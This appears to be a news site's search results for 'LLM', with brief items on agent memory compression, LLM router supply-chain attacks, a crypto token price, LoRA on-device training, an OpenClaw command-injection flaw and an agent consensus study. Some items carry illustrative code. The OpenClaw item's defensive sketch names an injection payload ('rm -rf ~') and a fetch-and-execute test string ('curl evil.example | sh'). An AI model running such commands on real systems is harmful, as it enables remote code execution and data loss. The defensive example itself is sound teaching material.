Search results for "LLM"
Today
05:14

Ramp Labs proposes a new solution for shared multi-agent memory, cutting token consumption by up to 65%

Ramp Labs' research, "Latent Briefing," achieves efficient memory sharing across multi-agent systems by compressing the LLM KV cache, reducing token consumption and improving accuracy. In LongBench v2 testing, the approach reduced worker-model token consumption by 65% and improved overall accuracy by about 3 percentage points, with compression taking only 1.7 seconds. The technique performs well across a range of document scenarios.
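The item above turns on a token-saving idea: workers consume a compressed briefing instead of the full context. As a purely illustrative sketch (not Ramp Labs' actual method, which compresses latent KV states rather than raw text; all names here are hypothetical), the arithmetic behind the savings looks like this:

```python
# Illustrative sketch only: a shared "briefing" that keeps a fraction of
# the original context reduces the tokens each worker agent must process.
# The real method compresses KV-cache states, not text.

def token_count(text: str) -> int:
    # Crude whitespace tokenizer as a stand-in for a real tokenizer.
    return len(text.split())

def make_briefing(document: str, ratio: float = 0.35) -> str:
    # Stand-in for compression: keep roughly `ratio` of the tokens.
    tokens = document.split()
    keep = max(1, round(len(tokens) * ratio))
    return " ".join(tokens[:keep])

document = ("word " * 1000).strip()
briefing = make_briefing(document)

full = token_count(document)
compressed = token_count(briefing)
savings = 1 - compressed / full
print(f"tokens: {full} -> {compressed} ({savings:.0%} saved)")
```

With a 0.35 keep ratio, each worker reads 350 tokens instead of 1,000 — the same 65% reduction the article reports, though here only as a toy analogy.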
06:17

Solayer’s founder releases research on LLM supply-chain security; more than 2% of free routers found to contain malicious code injection

Solayer’s founder details security risks in the LLM supply chain, pointing out that LLM agents relying on third-party API routers are exposed to malicious code injection. Testing shows that multiple routers have security vulnerabilities and can even leak sensitive credentials. The research also demonstrates feasible attack methods and corresponding defenses.
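One generic mitigation for this class of risk — illustrative only, not taken from the Solayer research, and the hostnames below are placeholder assumptions — is to pin exactly which router hosts may ever receive an agent's credentials:

```python
# Illustrative sketch: refuse to attach API credentials to any request
# whose host is not on a pinned allowlist, so a swapped or malicious
# third-party router never sees the key. Hostnames are examples only.
from urllib.parse import urlsplit

TRUSTED_ROUTERS = {"api.openai.com", "api.anthropic.com"}  # placeholder hosts

def attach_credentials(url: str, api_key: str) -> dict:
    host = urlsplit(url).hostname
    if host not in TRUSTED_ROUTERS:
        raise ValueError(f"untrusted router host: {host!r}")
    return {"Authorization": f"Bearer {api_key}"}

print(attach_credentials("https://api.openai.com/v1/chat", "sk-demo"))
```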
02:38

PIPPIN (pippin) rose 20.56% in the last 24 hours

Gate News update: On April 2, according to Gate market data, PIPPIN (pippin) is trading at $0.0603 as of the time of writing. Over the past 24 hours it is up 20.56%, with a high of $0.0779 and a low of $0.0499. The 24-hour trading volume is $21.2392 million, and its current market cap is approximately $60.3162 million. Pippin originated as an SVG unicorn drawn by ChatGPT 4o as part of a popular LLM benchmark. Pippin was created by Yohei Nakajima, a widely recognized innovator and thought leader in the AI VC space, known for his public-building approach and for being at the forefront of the "AI for VC" movement.
13:08

Tether introduces the BitNet LoRA framework, supporting large model training on mobile devices

Gate News report: On March 17, Tether's QVAC Fabric launched the world's first cross-platform LoRA fine-tuning framework for Microsoft's BitNet (1-bit LLM), significantly lowering the VRAM and compute requirements for large-model training. The framework supports LoRA fine-tuning and inference acceleration on Intel, AMD, and Apple Silicon M-series chips, as well as mobile GPUs (including Adreno, Mali, and Apple Bionic).
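Since the item hinges on LoRA's memory savings, here is a minimal NumPy sketch of the LoRA idea itself — generic, not QVAC Fabric's implementation: instead of updating a full d_out × d_in weight matrix, only two low-rank factors are trained, shrinking the trainable-parameter count and hence memory.

```python
# Generic LoRA sketch: the frozen weight W gets a trainable low-rank
# update B @ A, so only r * (d_in + d_out) parameters are trained.
import numpy as np

d_out, d_in, r = 1024, 1024, 8
rng = np.random.default_rng(0)

W = rng.standard_normal((d_out, d_in))   # frozen pretrained weight
A = rng.standard_normal((r, d_in))       # trainable low-rank factor
B = np.zeros((d_out, r))                 # trainable, initialized to zero

def forward(x):
    # Forward pass: base weight plus low-rank update.
    return W @ x + B @ (A @ x)

x = rng.standard_normal(d_in)
assert np.allclose(forward(x), W @ x)    # B starts at zero: no change yet

full_params = d_out * d_in
lora_params = r * (d_in + d_out)
print(f"trainable params: {lora_params} vs {full_params} "
      f"({lora_params / full_params:.1%} of full fine-tuning)")
```

At rank 8 on a 1024×1024 layer this trains about 1.6% of the full parameter count, which is the kind of reduction that makes on-device fine-tuning plausible.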
11:02

China Academy of Information and Communications Technology and Academic Partners Discover and Fix Critical OpenClaw Command Injection Vulnerability

The China Academy of Information and Communications Technology and academic teams discovered an LLM-driven command injection vulnerability in the bash-tools module of the open-source framework OpenClaw during an audit. Attackers can induce the LLM to execute injected commands, achieving remote code execution and data theft. The vulnerability disclosure process has been initiated and fix recommendations have been submitted.
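As a generic illustration of this vulnerability class — not OpenClaw's actual code, and all names below are hypothetical — compare an unsafe pattern that interpolates LLM output into a shell string with an allowlist-based alternative:

```python
# Illustrative command-injection pattern: an agent framework that pastes
# LLM output into a shell command lets a crafted response run anything.
import shlex
import subprocess

def run_unsafe(llm_output: str) -> None:
    # VULNERABLE: shell=True lets payloads like "x; rm -rf ~" through.
    subprocess.run(f"echo {llm_output}", shell=True)

ALLOWED = {"echo", "ls", "cat"}

def run_safer(llm_output: str) -> None:
    # Safer: tokenize, check against an allowlist, never invoke a shell.
    args = shlex.split(llm_output)
    if not args or args[0] not in ALLOWED:
        raise ValueError(f"command not allowed: {args[:1]}")
    subprocess.run(args, shell=False, check=True)

run_safer("echo hello")                 # permitted
try:
    run_safer("curl evil.example | sh")  # rejected before execution
except ValueError as e:
    print(e)
```

The key design choice is `shell=False` plus an explicit allowlist: the LLM's output is treated as data to validate, never as a command string to interpret.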
06:07

Bittensor Subnet Completes 72 Billion Parameter LLM Pretraining, TAO Rises 54.8% in Two Weeks

Bittensor subnet Templar completed pretraining of Covenant-72B, a decentralized language model with 72 billion parameters, on March 10th. The model demonstrated excellent performance on MMLU tests, surpassing multiple centralized baseline models. The project attracted collaboration from over 70 nodes, with all weights and checkpoints released under the Apache License. Following this news, Bittensor and its token experienced broad gains.
03:37

ETH Zurich Tests AI Agents' Blockchain Consensus Ability in Practice: Success Rate Only 41.6%

The ETH Zurich research team tested the Byzantine consensus capability of LLM agents and found that even without malicious nodes, the effective consensus rate was only 41.6%. As the number of nodes increases, reaching agreement becomes harder, and the situation worsens further once malicious nodes are added. The study concludes that current LLM agents are not yet reliable enough for secure consensus, and decentralized deployment should be approached with caution.
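A purely illustrative toy simulation — not the ETH Zurich protocol — shows one reason consensus gets harder as groups grow: when each agent answers correctly with probability below the 2/3 supermajority threshold classical BFT requires, the chance that enough agents agree shrinks with group size.

```python
# Toy model: each agent independently votes for the correct value with
# probability p_correct; consensus succeeds if a 2/3 supermajority does.
import random

def consensus_rate(n_agents: int, p_correct: float,
                   trials: int = 10_000, seed: int = 0) -> float:
    rng = random.Random(seed)
    successes = 0
    for _ in range(trials):
        votes = sum(rng.random() < p_correct for _ in range(n_agents))
        if votes * 3 >= n_agents * 2:   # 2/3 supermajority reached
            successes += 1
    return successes / trials

for n in (4, 7, 13):
    print(f"{n} agents: {consensus_rate(n, p_correct=0.6):.1%} consensus")
```

With per-agent reliability at 0.6 (below the 2/3 threshold), the simulated consensus rate falls as the group grows — a simplified echo of the study's finding, which involves far richer agent interaction than independent coin flips.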